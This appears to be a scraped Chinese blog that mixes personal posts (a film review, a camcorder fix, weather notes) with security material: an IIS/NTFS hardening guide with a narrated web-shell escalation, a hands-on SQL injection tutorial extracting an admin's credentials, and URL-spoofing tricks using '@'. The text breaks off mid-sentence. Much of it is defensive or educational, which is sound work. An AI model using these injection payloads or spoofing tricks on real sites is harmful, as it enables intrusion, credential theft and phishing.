刚刚把“蝴蝶”看完了,一部法国的老片了。看过这部片子以后你就知道为什么人家说“吉祥三宝”在抄袭这部电影了。吉祥三宝的风格和这部电影片尾的主题曲的风格基本是一样的。

    片中还有好多经典的对白,如:
    1.如果存在所谓“爱的证据”,那就说明人们缺乏信心。而当人们没有信心的时候,爱也就不存在了。
    2.人怎么样才能富有呢?最好就是,做自己喜欢做的事。

我还是比较推荐观看这部片子的。 🙂

图片附件:
le papillon.jpg
图片附件:
100004658.jpg

DV机的价格是越来越便宜了。最近我也和家人商量,添置了一台DV机,准备用这台机器拍摄下家里出去旅行、生日聚会的精彩画面。前天是叔父的生日,所以家里变将新买的机器带到叔父家准备给叔父的生日来个视频留念。不过由于当时比较匆忙,所以忘了购买DV带,直到到了叔父所在请客吃饭的酒店才发现。这下可急坏了笔者,不过没办法只能打电话和自己熟悉的朋友,看看能不能马上送一盘使用过的DV带过来救个急。最终还好,一个老朋友关键时候送来了一盘SONY牌DV带才救了急。

  故障出现

  当天拍摄非常的顺利,而笔者也将DV带拍摄的一点不剩。回到家以后马上先回放了一边DV带,发现里面录制的节目全部都呈现出类似马赛克的情况。开始以为是机器的故障,于是将机器倒回前面重新播放,问题依旧。难道是这盘磁带坏了?马上翻出自己以前拍摄的DV带进行播放,发现问题依旧,所有的视频画面都出现了类似马赛克一样的情况。当笔者将DV与电脑连接采集视频的时候,所有采集的画面无一例外的都充满了马赛克图像(图1、图2)。

看原大图  
图1

看原大图
图2

  检查问题

  机器才买一个多月应该不会出现磁头老化的问题,那么问题什么机器出现这样的故障?由于机器之前工作正常,所以笔者就开始怀疑是否是朋友给的DV带存在问题。果然将朋友的DV和自己的早前购买的DV带相比发现了端倪,笔者购买的DV带上面的都有生产编号(图3),而且做工很细致,相比朋友借给笔者的DV带要好了很多,所以初步估计笔者的机器就是由于使用了已经被使用过的劣质DV而将磁头弄脏(弄坏)。

看原大图
图3

  清洗磁头

  如果是磁头脏了的话,那么可以使用DV清洗带来对磁头进行清洗。将DV清洗带(一般机器随机都有赠送)放入机器并将DV设置为VCR模式并进行播放,这个时候清洗工作就还是进行了,一般来说只要十几秒就可以清洗结束了。笔者清洗了两次以后重新开机使用DV播放器,发现问题依旧存在,看来问题并没有完全得到解决。而这个时候笔者也无法继续使用DV带进行清洗,因为使用清洁带清洗磁头的时候容易磨损磁头,如果多次进行的话很可能造成磁头的磨损从而损坏。

  最终解决

  在无奈的情况下,笔者想到了一个以前录象机解决播放雪花问题的方法,具体的过程就是放入机器一盘空录像带,然后快进快退几次以后问题就可以得到解决,那么录像机的部分原理和DV一致,不知道是否可以尝试。最后笔者将DV中放入了一盘空白DV带,来回运行了几次,再接着将自己以前拍摄的DV带放入进行回放,故障解决,液晶屏幕传来的已经是清晰的画面,看来到这里为止,所有的问题已经解决了。

  后记

  通过此次事件,笔者只想说几点自己的感受。首先在购买DV带的时候一定要严格把关,别贪便宜买了几盘便宜的DV带而搞的DV磁头损坏。其次,购买的DV带一般不要多次反复使用,这样很容易磨损磁头,同时也会因为磁粉脱落而造成磁头变脏。最后就是当机器播放画面出现问题的时候可以采取用清洗带清洗、用无水酒精清洗或者是笔者刚刚介绍的这个方法来解决。

   随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对crackers们说:NO!

  要打造一台安全的WEB服务器,那么这台服务器就一定要使用NTFS和Windows NT/2000/2003。众所周知,Windows是一个支持多用户、多任务的操作系统,这是权限设置的基础,一切权限设置都是基于用户和进程而言的,不同的用户在访问这台计算机时,将会有不同的权限。DOS是个单任务、单用户的操作系统。但是我们能说DOS没有权限吗?不能!当我们打开一台装有DOS操作系统的计算机的时候,我们就拥有了这个操作系统的管理员权限,而且,这个权限无处不在。所以,我们只能说DOS不支持权限的设置,不能说它没有权限。随着人们安全意识的提高,权限设置随着NTFS的发布诞生了。

  Windows NT里,用户被分成许多组,组和组之间都有不同的权限,当然,一个组的用户和用户之间也可以有不同的权限。下面我们来谈谈NT中常见的用户组。

  Administrators,管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以,只有受信任的人员才可成为该组的成员。

  Power Users,高级用户组,Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中,这个组的权限是仅次于Administrators的。

  Users:普通用户组,这个组的用户无法进行有意或无意的改动。因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序。Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上,默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。

  Guests:来宾组,按默认值,来宾跟普通Users的成员有同等访问权,但来宾帐户的限制更多。

  Everyone:顾名思义,所有的用户,这个计算机上的所有用户都属于这个组。

  其实还有一个组也很常见,它拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在察看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。由于该组只有这一个用户SYSTEM,也许把该组归为用户的行列更为贴切。

  权限是有高低之分的,有高权限的用户可以对低权限的用户进行操作,但除了Administrators之外,其他组的用户不能访问 NTFS 卷上的其他用户资料,除非他们获得了这些用户的授权。而低权限的用户无法对高权限的用户进行任何操作。

  我们平常使用计算机的过程当中不会感觉到有权限在阻挠你去做某件事情,这是因为我们在使用计算机的时候都用的是Administrators中的用户登陆的。这样有利也有弊,利当然是你能去做你想做的任何一件事情而不会遇到权限的限制。弊就是以 Administrators 组成员的身份运行计算机将使系统容易受到特洛伊木马、病毒及其他安全风险的威胁。访问 Internet 站点或打开电子邮件附件的简单行动都可能破坏系统。不熟悉的 Internet 站点或电子邮件附件可能有特洛伊木马代码,这些代码可以下载到系统并被执行。如果以本地计算机的管理员身份登录,特洛伊木马可能使用管理访问权重新格式化您的硬盘,造成不可估量的损失,所以在没有必要的情况下,最好不用Administrators中的用户登陆。

  Administrators中有一个在系统安装时就创建的默认用户—-Administrator,Administrator 帐户具有对服务器的完全控制权限,并可以根据需要向用户指派用户权利和访问控制权限。因此强烈建议将此帐户设置为使用强密码。永远也不可以从 Administrators 组删除 Administrator 帐户,但可以重命名或禁用该帐户。由于大家都知道“管理员”存在于许多版本的 Windows 上,所以重命名或禁用此帐户将使恶意用户尝试并访问该帐户变得更为困难。对于一个好的服务器管理员来说,他们通常都会重命名或禁用此帐户。Guests用户组下,也有一个默认用户—-Guest,但是在默认情况下,它是被禁用的。如果没有特别必要,无须启用此账户。我们可以通过“控制面板”–“管理工具”–“计算机管理”–“用户和用户组”来查看用户组及该组下的用户。

  我们用鼠标右键单击一个NTFS卷或NTFS卷下的一个目录,选择“属性”–“安全”就可以对一个卷,或者一个卷下面的目录进行权限设置,此时我们会看到以下七种权限:完全控制、修改、读取和运行、列出文件夹目录、读取、写入、和特别的权限。“完全控制”就是对此卷或目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。选中了“完全控制”,下面的五项属性将被自动被选中。“修改”则像Power users,选中了“修改”,下面的四项属性将被自动被选中。下面的任何一项没有被选中时,“修改”条件将不再成立。“读取和运行”就是允许读取和运行在这个卷或目录下的任何文件,“列出文件夹目录”和“读取”是“读取和运行”的必要条件。“列出文件夹目录”是指只能浏览该卷或目录下的子目录,不能读取,也不能运行。“读取”是能够读取该卷或目录下的数据。“写入”就是能往该卷或目录下写入数据。而“特别”则是对以上的六种权限进行了细分。读者可以自行对“特别”进行更深的研究,鄙人在此就不过多赘述了。

  下面我们对一台刚刚安装好操作系统和服务软件的WEB服务器系统和其权限进行全面的刨析。服务器采用Windows 2000 Server版,安装好了SP4及各种补丁。WEB服务软件则是用了Windows 2000自带的IIS 5.0,删除了一切不必要的映射。整个硬盘分为四个NTFS卷,C盘为系统卷,只安装了系统和驱动程序;D盘为软件卷,该服务器上所有安装的软件都在D盘中;E盘是WEB程序卷,网站程序都在该卷下的WWW目录中;F盘是网站数据卷,网站系统调用的所有数据都存放在该卷的WWWDATABASE目录下。这样的分类还算是比较符合一台安全服务器的标准了。

  希望各个新手管理员能合理给你的服务器数据进行分类,这样不光是查找起来方便,更重要的是这样大大的增强了服务器的安全性,因为我们可以根据需要给每个卷或者每个目录都设置不同的权限,一旦发生了网络安全事故,也可以把损失降到最低。当然,也可以把网站的数据分布在不同的服务器上,使之成为一个服务器群,每个服务器都拥有不同的用户名和密码并提供不同的服务,这样做的安全性更高。不过愿意这样做的人都有一个特点—-有钱:)。好了,言归正传,该服务器的数据库为MS-SQL,MS-SQL的服务软件SQL2000安装在d:\\ms-sqlserver2K目录下,给SA账户设置好了足够强度的密码,安装好了SP3补丁。

  为了方便网页制作员对网页进行管理,该网站还开通了FTP服务,FTP服务软件使用的是SERV-U 5.1.0.0,安装在d:\\ftpservice\\serv-u目录下。杀毒软件和防火墙用的分别是Norton Antivirus和BlackICE,路径分别为d:\\nortonAV和d:\\firewall\\blackice,病毒库已经升级到最新,防火墙规则库定义只有80端口和21端口对外开放。网站的内容是采用动网7.0的论坛,网站程序在e:\\www\\bbs下。细心的读者可能已经注意到了,安装这些服务软件的路径我都没有采用默认的路径或者是仅仅更改盘符的默认路径,这也是安全上的需要,因为一个黑客如果通过某些途径进入了你的服务器,但并没有获得管理员权限,他首先做的事情将是查看你开放了哪些服务以及安装了哪些软件,因为他需要通过这些来提升他的权限。  

  一个难以猜解的路径加上好的权限设置将把他阻挡在外。相信经过这样配置的WEB服务器已经足够抵挡大部分学艺不精的黑客了。读者可能又会问了:“这根本没用到权限设置嘛!我把其他都安全工作都做好了,权限设置还有必要吗?”当然有!智者千虑还必有一失呢,就算你现在已经把系统安全做的完美无缺,你也要知道新的安全漏洞总是在被不断的发现。权限将是你的最后一道防线!那我们现在就来对这台没有经过任何权限设置,全部采用Windows默认权限的服务器进行一次模拟攻击,看看其是否真的固若金汤。

  假设服务器外网域名为http://www.webserver.com,用扫描软件对其进行扫描后发现开放WWW和FTP服务,并发现其服务软件使用的是IIS 5.0和Serv-u 5.1,用一些针对他们的溢出工具后发现无效,遂放弃直接远程溢出的想法。打开网站页面,发现使用的是动网的论坛系统,于是在其域名后面加个/upfile.asp,发现有文件上传漏洞,便抓包,把修改过的ASP木马用NC提交,提示上传成功,成功得到WEBSHELL,打开刚刚上传的ASP木马,发现有MS-SQL、Norton Antivirus和BlackICE在运行,判断是防火墙上做了限制,把SQL服务端口屏蔽了。通过ASP木马查看到了Norton Antivirus和BlackICE的PID,又通过ASP木马上传了一个能杀掉进程的文件,运行后杀掉了Norton Antivirus和BlackICE。再扫描,发现1433端口开放了,到此,便有很多种途径获得管理员权限了,可以查看网站目录下的conn.asp得到SQL的用户名密码,再登陆进SQL执行添加用户,提管理员权限。也可以抓SERV-U下的ServUDaemon.ini修改后上传,得到系统管理员权限。还可以传本地溢出SERV-U的工具直接添加用户到Administrators等等。大家可以看到,一旦黑客找到了切入点,在没有权限限制的情况下,黑客将一帆风顺的取得管理员权限。

  那我们现在就来看看Windows 2000的默认权限设置到底是怎样的。对于各个卷的根目录,默认给了Everyone组完全控制权。这意味着任何进入电脑的用户将不受限制的在这些根目录中为所欲为。系统卷下有三个目录比较特殊,系统默认给了他们有限制的权限,这三个目录是Documents and settings、Program files和Winnt。对于Documents and settings,默认的权限是这样分配的:Administrators拥有完全控制权;Everyone拥有读&运,列和读权限;Power users拥有读&运,列和读权限;SYSTEM同Administrators;Users拥有读&运,列和读权限。对于Program files,Administrators拥有完全控制权;Creator owner拥有特殊权限;Power users有完全控制权;SYSTEM同Administrators;Terminal server users拥有完全控制权,Users有读&运,列和读权限。对于Winnt,Administrators拥有完全控制权;Creator owner拥有特殊权限;Power users有完全控制权;SYSTEM同Administrators;Users有读&运,列和读权限。而非系统卷下的所有目录都将继承其父目录的权限,也就是Everyone组完全控制权!

  现在大家知道为什么我们刚刚在测试的时候能一帆风顺的取得管理员权限了吧?权限设置的太低了!一个人在访问网站的时候,将被自动赋予IUSR用户,它是隶属于Guest组的。本来权限不高,但是系统默认给的Everyone组完全控制权却让它“身价倍增”,到最后能得到Administrators了。那么,怎样设置权限给这台WEB服务器才算是安全的呢?大家要牢记一句话:“最少的服务+最小的权限=最大的安全”对于服务,不必要的话一定不要装,要知道服务的运行是SYSTEM级的哦,对于权限,本着够用就好的原则分配就是了。对于WEB服务器,就拿刚刚那台服务器来说,我是这样设置权限的,大家可以参考一下:各个卷的根目录、Documents and settings以及Program files,只给Administrator完全控制权,或者干脆直接把Program files给删除掉;给系统卷的根目录多加一个Everyone的读、写权;给e:\\www目录,也就是网站目录读、写权。

  最后,还要把cmd.exe这个文件给挖出来,只给Administrator完全控制权。经过这样的设置后,再想通过我刚刚的方法入侵这台服务器就是不可能完成的任务了。可能这时候又有读者会问:“为什么要给系统卷的根目录一个Everyone的读、写权?网站中的ASP文件运行不需要运行权限吗?”问的好,有深度。是这样的,系统卷如果不给Everyone的读、写权的话,启动计算机的时候,计算机会报错,而且会提示虚拟内存不足。当然这也有个前提—-虚拟内存是分配在系统盘的,如果把虚拟内存分配在其他卷上,那你就要给那个卷Everyone的读、写权。ASP文件的运行方式是在服务器上执行,只把执行的结果传回最终用户的浏览器,这没错,但ASP文件不是系统意义上的可执行文件,它是由WEB服务的提供者—-IIS来解释执行的,所以它的执行并不需要运行的权限。

  经过上面的讲解以后,你一定对权限有了一个初步了了解了吧?想更深入的了解权限,那么权限的一些特性你就不能不知道了,权限是具有继承性、累加性 、优先性、交叉性的。

  继承性是说下级的目录在没有经过重新设置之前,是拥有上一级目录权限设置的。这里还有一种情况要说明一下,在分区内复制目录或文件的时候,复制过去的目录和文件将拥有它现在所处位置的上一级目录权限设置。但在分区内移动目录或文件的时候,移动过去的目录和文件将拥有它原先的权限设置。

  累加是说如一个组GROUP1中有两个用户USER1、USER2,他们同时对某文件或目录的访问权限分别为“读取”和“写入”,那么组GROUP1对该文件或目录的访问权限就为USER1和USER2的访问权限之和,实际上是取其最大的那个,即“读取”+“写入”=“写入”。 又如一个用户USER1同属于组GROUP1和GROUP2,而GROUP1对某一文件或目录的访问权限为“只读”型的,而GROUP2对这一文件或文件夹的访问权限为“完全控制”型的,则用户USER1对该文件或文件夹的访问权限为两个组权限累加所得,即:“只读”+“完全控制”=“完全控制”。

  优先性,权限的这一特性又包含两种子特性,其一是文件的访问权限优先目录的权限,也就是说文件权限可以越过目录的权限,不顾上一级文件夹的设置。另一特性就是“拒绝”权限优先其它权限,也就是说“拒绝”权限可以越过其它所有其它权限,一旦选择了“拒绝”权限,则其它权限也就不能取任何作用,相当于没有设置。

  交叉性是指当同一文件夹在为某一用户设置了共享权限的同时又为用户设置了该文件夹的访问权限,且所设权限不一致时,它的取舍原则是取两个权限的交集,也即最严格、最小的那种权限。如目录A为用户USER1设置的共享权限为“只读”,同时目录A为用户USER1设置的访问权限为“完全控制”,那用户USER1的最终访问权限为“只读”。

  权限设置的问题我就说到这了,在最后我还想给各位读者提醒一下,权限的设置必须在NTFS分区中才能实现的,FAT32是不支持权限设置的。同时还想给各位管理员们一些建议:

  1.养成良好的习惯,给服务器硬盘分区的时候分类明确些,在不使用服务器的时候将服务器锁定,经常更新各种补丁和升级杀毒软件。

  2.设置足够强度的密码,这是老生常谈了,但总有管理员设置弱密码甚至空密码。

  3.尽量不要把各种软件安装在默认的路径下

  4.在英文水平不是问题的情况下,尽量安装英文版操作系统。

  5.切忌在服务器上乱装软件或不必要的服务。

  6.牢记:没有永远安全的系统,经常更新你的知识。

今天昆明比昨天还冷,估计气温就在16°C左右。不过阴两天也好,昆明已经闹干旱了。再不下雨恐怕到处都要闹火灾了。
从今天开始就正式放假了,5.5,5.6上班,5.7放假,5.8又上班。还真是奇怪的放假。就是不按规矩来。

今天昆明终于下雨了,昨天都还是大晴天,今天一醒来就发现在下中雨了。温度马上就降下来了,穿了外衣都还感觉有点冷。

看原大图

今天也是最后一天上班了,明天就可以开始五一大假了。哈哈哈哈。原先本来打算到浙江、上海去Happy的,但是听同学建议:“如果能不是五一来的话就尽量 不五一来吧。五一来的话挤死你。而且根本看不到景,都看人了。抢景点。”所以决定把这个事暂时先Delay一下。等找个人不多的时候再去。
等想想五一怎么安排了….

如果你已经掌握了SQL注入漏洞的一些相关的基础知识,那是不是觉得看了理论有一种想急于知道如何实际动手操作的冲动,好吧,Let’s go,这篇文章我们就来实战SQL注入,不过针对网站的数据库是ACCESS的,毕竟在国内都是用虚拟机,一般只有FTP上传权限,所以还是很有市场的。

  首先要注意的是,如果你以前没试过SQL注入的话,那么第一步先把IE菜单=>工具=>Internet选项=>高级= >显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。

  1.入侵测试目标:

  前不久我们学校的一个同学做了个网站,做的还挺漂亮的,叫我去看下,我顺便对它进行了一次安全检测。文章发表前已经征得该同学的同意,请不要效仿。下面的真实网址已经被我屏蔽。

  测试网站:http://www.xxx.com/index.asp

  2.寻找可能的SQL注入点

  我们知道,一般的文章管理系统,下载系统,论坛,留言本,相册等都会有个show.asp?id= list.asp?id= news.asp?id= 什么的,其实一看就知道是调用SQL语句查询数据库并显示出来。我们不难发现这个站的新闻系统就是show.asp?id=的形式,随便点一个链接得到地 址如下:

  http://www.xxx.com/show.asp?id=474

  从这个地址就知道是通过show.asp执行SQL语句访问数据库,可想而知,SQL语句原貌大致如下:

  select * from 表名 where 字段=xx,如果这个show.asp对后面的id整型参数过滤好的话,就可能存在SQL注入漏洞。

  3.判断SQL注入是否存在

  通过上面的分析知道,要判断有没有SQL注入漏洞,就得看show.asp有没对参数过滤好,所以可以用以下步骤测试SQL注入是否存在。

  a.最简单的判断方法

  在要检测的网址后面加一个单引号:http://www.xxx.com /show.asp?id=474’

  此时show.asp中的SQL语句变成了:select * from 表名 where 字段=xx’,如果程序没有过滤好“’”的话,就会提示 show.asp运行异常;但这样的方法虽然很简单,但并不是最好的,因为:

  第一:不一定每台服务器的IIS都返回具体错误提示给客户端,如果程序中加了cint(参数)之类语句的话,SQL注入是不会成功的,但服务器同样会报错,具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。

  第二:由于以前存在过的1’ or ‘1’=’1漏洞,所以目前大多数程序员已经将“’“ 过滤掉,所以用" ‘"测试不到注入点,所以一般使用经典的1=1和1=2测试方法,如下:

  http://www.xxx.com /show.asp?id=474 and 1=1, show.asp运行正常,而且与http://www.xxx.com /show.asp?id=474运行结果相同,如图1:

看原大图

  http://ww.xxx.com /show.asp?id=474 and 1=2, show.asp运行异常,(这就是经典的 1=1 1=2 判断方法)如图2:

看原大图

  这里很明显当加 and 1=1 的时候返回完全正常的页面,加 and 1=2 显示:暂时还没有文章!

  到这里基本上可以断定他存在SQL注入,至于能不能注出账号密码来,还需要更进一步的注入测试,这里只能得到SQL注入点: http://www.xxx.com/show.asp?id=474

  4.判断表是否存在

  国内的一般程序员在设计数据库的时候都会用一些特定的做为表名,字段名什么的。比如说后台管理员一般放在表admin里面,而注册的用户放在表users里,当然,只是一般,依照各程序的不同而不同。

  这个站是我同学自己写的,我还是先判断管理员表admin是否存在,在后面加上语句:and exists (select * from admin)变成http://www.xxx.com/show.asp?id=474 and exists (select * from admin)提交访问后返回的页面如图3:

看原大图

  这就说明我猜的admin表名不存在,继续猜另外的名字,这里可以参考国内常见的程序的表名,比如:admin user vote manage users 会员 用户 管理员 admin_admin userinfo bbs news system等,这个站我最后猜到的是:users,语句:and exists (select * from users)。

  5.进一步判断表里的字段是否存在

  判断字段id 是否存在,这个一般都有,自动编号。如果存在了顺便猜一下管理员的id值。

  判断存在语句:and exists(select id from users)

  判断编号语句:and exists(select id from users where id=1)

  一般管理员账号密码放在第一位,也就是id=1,如果不是就猜下去,猜id=2 猜id=3等啦。

  由于这个站是自己写的代码,所以会有点不同,当判断是否不过你可以猜到他的对应的可能是userid,因为他表名取做user呀,把上面的id改为userid就返回了正常的页面,如图4:

看原大图

  至于这个userid值为多少,同样猜,and exists(select userid where userid=1)改变1这个数字,一直猜到页面显示正常为止。这里我猜到的是userid=11,如图5:

看原大图

  最后猜出这个继续猜出其它的字段,用户名字段最后为username,密码字段为userpwd,用到的语句分别为:and exists (select username from users)和and exists (select userpwd from users),这里就不抓图了。

  6.再进一步判断账号和密码的长度

  这里我说一下常用的方法,判断的时候大于小于一起用嘛,学过数据结构的人都知道有二分法,我这里也引用一下,比如说你判断 >4 而又判断<12 那我接下来就取中间的看是大于8还是小于8,如果是大于8则说明在8到12之间,如果是小于8说明在4到8之间,再接着用二分法判断下去。。。。。。当然 由于账号密码一般人不会太长,所以在这里二分法的优势体现的不够明显,不过到下面猜账号密码字符的时候就能明显感受到了。

  首先判断账号username的字符长度:and exists (select userid from users where len(username)<10 and userid=11),返回正常说明长度小于10,and exists (select userid from users where len(username)>5 and userid=11),返回不正常说明长度小于5,最后猜到的是

  and exists (select userid from users where len(username)=4 and userid=11),说明账号的长度为4,也太短了吧,呵呵,别高兴的太早,如图6:

看原大图

  再接下来猜密码长度,与猜解账号长度类似,最后猜到密码长度为16位,语句:and exists (select userid from users where len(userpwd)=16 and userid=11),不过我要提醒的是,一般遇到16位或者32位的密码,我都会想到MD5加密,当然可以暴力破解。

  到此,我们得到的信息如下:

  账号username长度:4

  密码userpwd长度:16

  7.猜解账号密码字符

  在这里的猜解要用到asc(mid())这个函数。前面基础篇我们已经讲过这些函数了,我这里稍提一下。asc()是把字符转换为其对应的ASC码,mid()则是定位字符串里的字符。

  格式:mid(字符串,开始位置,子串长度)

  比如说mid(name,1,1)即取name字符串里第一个字符。如果这里的name等于xysky 则mid(name,1,1)=x而mid(name,1,2)则取y

  这两个函数结合asc(mid())则是先定位字符串里的字符再取其ASC码,比如asc(mid(username,2,1))则是判断 username字符串里的第二位的ASC码,在SQL注入里常用它,有汉字也不用怕,不过遇上了汉字确实有点郁闷,中文字符的asc值小于0的。在后面 加上如下的语句:

  and 11=(select userid from users where asc(mid(username,1,1))<0) 返回正常,说明账号果然是汉字,下面的事就不那么容易了。下面我们用到二分法的思想开始猜解第一位字符:

  and 11=(select userid from users where asc(mid(username,1,1))<-19000) 返回正常

  and 11=(select userid from users where asc(mid(username,1,1))>-20000) 返回正常

  以上说明账号的第一个字符的ASCII码在-19000和-20000之间,再用二分法猜解下去,最后的第一个为:-19765

  and 11=(select userid from users where asc(mid(username,1,1))= -19765)

  ASCII码为-19765对应的字符就是:菜

  下面接着猜第二个字符,最后语法为:and 11=(select userid from users where asc(mid(username,2,1))=-15119),这里抓个图,如图7:

看原大图

  对应字符为:鸟

  到这里我想其它不用猜了,因为这个网站上的信息已经告诉我们了:

  作者:菜鸟老师 票数:0等级:点击:308 呵呵,如果没错的话就是它了。

  接着猜密码,依然二分法,就不抓图了:

  and 11=(select userid from users where asc(mid(userpwd,1,1))<50)

  and 11=(select userid from users where asc(mid(userpwd,1,1))>40)

  最后得到的为:48 对应的字符就是0

  依此下去,最后得到加密后的MD5值为:00d60a849c6c381e ,由于MD5目前没有好的破解方法,只能暴力破解,我们就此打此。

  8.后台的猜解

  经过前面辛苦的猜解,我们已经得到这个网站的账号密码了,当然这里已经是MD5加密了,我们只是说一下常规的SQL注入攻击中的一步,往往也 是最为关键的一步:寻找网站管理后台。像这样动态生成页面的网站,一般都会有个管理后台的,添加文章编辑文章修改文章删除文章什么的,而一般的程序员在命 名后台的时候往往是:admin_index.asp admin_login.asp admin.asp admin/admin_index.asp admin/admin_login.asp,当然还有退出后台的文件:logout.asp admin_logout.asp admin/admin_logout.asp等。一个一个的访问,结果嘛,我只能说靠运气加上你的经验了。以这个站为例,前面那些登录的我一个也没猜 到,因为我猜到有admin这个目录,我就一直以为登录的页面也在admin目录,猜了好久,最后无意访问admin/logout.asp,页面居然自 动转到后台登录页面了,居然是上一级目录的login.asp,我狂汗,如图8:

看原大图

  有了后台,有了账号密码(当然这个站是MD5加密的密码,我也懒得破解),你就可以进后台了,至于进后台你能做什么,就看后台的功能与你的技术了,你想做什么,就依靠你自己了,本文只演示SQL注入漏洞最基本的注入,想深入研究的朋友一定要好好掌握哦!

文本代码保护是件很头痛的事,随着了解的加深保护的方法越多,也就意味着漏洞越多.
下面说说我的经验,有更好方法的欢迎交流QQ:17789897.

[-调取原代码的方法-]

1:右键 – 查看原文件
2:查看 – 原文件
3:文件 – 另存为
4:IE缓存
5:还可以通过代码提取
教程代码:
<SCRIPT>
function add()
{
var ress=document.forms[0].it315zhangxx.value
window.location="view-source:"+ress;
}
</SCRIPT>

<p>在网页源代码查看器中输入要查看网页源代码的URL地址:
<p> 
<FORM><INPUT name=it315zhangxx size=56 value=http://></FORM>
<FORM>
<INPUT onclick=add() type=button value=查看网页源代码></FORM>

[-关于保护-]

先通过代码来禁止IE的一些操作

:禁止另存为
<NOSCRIPT><IFRAME src="/*.html>";</IFRAME></NOSCRIPT>

:取消选取、防止复制 不准粘贴 防止复制>
<BODY onselectstart="return false" oncut="return false;" onpaste="return false" onmouseover="window.status=‘ ‘;return true" oncopy="return false;" bgColor=#ffffff leftMargin=0 topMargin=0>

:禁止右键>
<SCRIPT language=JavaScript>
<!–

if (window.Event)
document.captureEvents(Event.MOUSEUP);

function nocontextmenu()
{
event.cancelBubble = true
event.returnValue = false;

return false;
}

function norightclick(e)
{
if (window.Event)
{
if (e.which == 2    e.which == 3)
return false;
}
else
if (event.button == 2    event.button == 3)
{
event.cancelBubble = true
event.returnValue = false;
return false;
}

}

document.oncontextmenu = nocontextmenu; // for IE5+
document.onmousedown = norightclick; // for all others
//–>
</SCRIPT>
:状态栏固定
<body bgcolor="#fef4d9" onmouseover="self.status=‘自定义资料‘;return true">

:禁止缓存 在页面中使用HTML标记,如下面:
<HEAD>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Expires content=0>

-利用上面的代码可以禁止下面几种手段-
1:右键 – 查看原文件
3:文件 – 另存为
4:IE缓存

-用代码本身很难禁止下面的手段我门就迷惑的方法阻止调出原代码-
2:查看 – 原文件
5:还可以通过代码提取

URL欺骗(可以隐藏真实地址)
教程代码:

<meta http-equiv="refresh" content="0;url=‘http://东邪.明天毕竟又是新的一天@www.hack.net/index.htm‘">

注意代码中url=‘http://东邪.明天毕竟又是新的一天@www.hack.net/index.htm‘"
@ 符号前面的[http://东邪.明天毕竟又是新的一天]就是欺骗后在IE中出现的效果 也可以是 http://www.163.com
后面的不用说就是连接的真实地址 www.hack.net/index.htm

URL迷惑
<meta http-equiv="refresh" content="0;url=‘http://东邪.明天毕竟又是新的一天@.htm‘">
注意这一段和上面的有什么不同对就是.htm 那.htm是什么呢呵呵其实就是真实地址
怎么访问呢 有.htm吗
呵呵我门要做的就就做一个没有名字的HTM
方法很简单先创建个XXX.htm 上传到 QQ网络硬盘 双激文件名将XXX删除 怎么样.htm出来了吧

这样就算得到原代码很难看出真实地址
列1:http://东邪.明天毕竟又是新的一天@.htm
列2:http://www.163.com/@.htm
呵呵很难看出真实地址是什么吧

[JS禁止 用IE – 查看 – 原文件]
也是迷惑的方法 但是可以绝对禁止以上面的方式调用原文件
要用到JS
教程JS代码
var oPopup = window.createPopup();
var popTop=50;
function popmsg(msgstr){
var winstr="<table style=/"border: 1 solid #000000/" width=/"241/" height=/"172/" border=/"0/" cellpadding=/"0/" cellspacing=/"0/">";
winstr+="<tr><td height=/"150/"></td><td align=/"center/"><table width=/"90%/" height=/"110/" border=/"0/" cellpadding=/"0/" cellspacing=/"0/">";
winstr+="<tr><td valign=/"top/" style=/"font-size:12px; color: #F00000; face: Tahoma/">"+msgstr+"</td></tr></table></td></tr></table>";
oPopup.document.body.innerHTML = winstr;
popshow();
}
function popshow(){
window.status=popTop;
if(popTop>1720){
clearTimeout(mytime);
oPopup.hide();
return;
}else if(popTop>1520&&popTop<1720){
oPopup.show(screen.width-250,screen.height,241,1720-popTop);
}else if(popTop>1500&&popTop<1520){
oPopup.show(screen.width-250,screen.height+(popTop-1720),241,172);
}else if(popTop<180){
oPopup.show(screen.width-250,screen.height,241,popTop);
}else if(popTop<220){
oPopup.show(screen.width-250,screen.height-popTop,241,172);
}
popTop+=10000;
var mytime=setTimeout("popshow();",1);
}
popmsg(" ");

另存为 17789897.js

HTM调用JS代码
<SCRIPT language=javascript
src="/17789897.js"></SCRIPT>
呵呵有写朋友可能熟悉但是我要告诉你他现在的作用是禁止同过 [IE – 查看 – 原文件]
区别在这段代码
popTop+=10000;
var mytime=setTimeout("popshow();",1);
看到了吗?速度是10000
不用我说也知道是什么意思了吧

把上面JS和HTM调用JS代码
加到网页里就可以禁止 [IE – 查看 – 原文件]
关于保护我知道的就这些.

[-关于加密-]
我建议重要的代码采用复合加密
方式基本上有以下几种
JS编码
escape加密
8进制转义字符串
16进制转义字符串
10进制HTML编码如下
16进制HTML编码如下
都可以用<script>
<!–
document.write(unescape("加密后的代码"));
//–>
</script>
由于他门的代码很大还有JS文件我就不给了
大家可以去baidu.com搜索

[-关于破解-]
正所谓魔高一尺,道高一丈,再复杂的加密,在多的迷惑,还是要用IE来解码
给大家个超级技巧
在地址栏或按Ctrl+O,输入:

